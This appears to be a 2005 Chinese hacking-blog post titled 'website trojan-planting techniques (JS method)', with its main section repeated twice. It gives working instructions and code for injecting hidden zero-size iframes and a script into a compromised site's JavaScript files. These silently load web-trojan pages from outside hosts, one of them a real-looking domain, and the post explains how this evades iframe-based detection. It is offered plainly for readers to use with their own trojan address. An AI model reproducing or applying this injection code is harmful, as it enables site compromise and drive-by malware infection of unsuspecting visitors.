2005-11-26 12:20:04 by: h4x0r
网站挂马的技巧(js法)
一般的办法是在一个地方写上<iframe src="muma.htm" width="0" height="0" frameborder="0"></iframe> 这样就可以访问muma的页面了
升级一下
先找找主页里面是否有JS的脚本,找到script language="javascript" src="/xxxx.js"之类就成功了,接下来把这个JS下载下来,往里面加以下代码(最好在原来的代码上,回车一行加上代码)
document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://XXXXX.com/ma.htm" frameBorder=0 width=0 scrolling=no height=0 topmargin="0" leftmargin="0"></IFRAME>');
以上代码中的http://XXXXX.com/ma.htm,换成你自己的网页木马的地址.
再把修改好的JS上传覆盖原来的JS,就可以了.
哈哈...是不是很隐蔽了!
另外,这一句同样不错,用script实现的。所以对于一般别人检查iframe来判断有无被挂马是一个突破
<script>
file://window.showModelessDialog("javascript:window.open('http://2112.3322.com/mm/ray.htm','k','top=3000,left=3000,width=0,height=0');
window.close();","n","scroll:0;status:0;help:0;resizable:0;dialogWidth:0px;dialogHeight:0px");
</script>
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=191
升级一下
先找找主页里面是否有JS的脚本,找到script language="javascript" src="/xxxx.js"之类就成功了,接下来把这个JS下载下来,往里面加以下代码(最好在原来的代码上,回车一行加上代码)
document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://XXXXX.com/ma.htm" frameBorder=0 width=0 scrolling=no height=0 topmargin="0" leftmargin="0"></IFRAME>');
以上代码中的http://XXXXX.com/ma.htm,换成你自己的网页木马的地址.
再把修改好的JS上传覆盖原来的JS,就可以了.
哈哈...是不是很隐蔽了!
另外,这一句同样不错,用script实现的。所以对于一般别人检查iframe来判断有无被挂马是一个突破
<script>
file://window.showModelessDialog("javascript:window.open('http://2112.3322.com/mm/ray.htm','k','top=3000,left=3000,width=0,height=0');
window.close();","n","scroll:0;status:0;help:0;resizable:0;dialogWidth:0px;dialogHeight:0px");
</script>
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=191
There is no comment on this article.
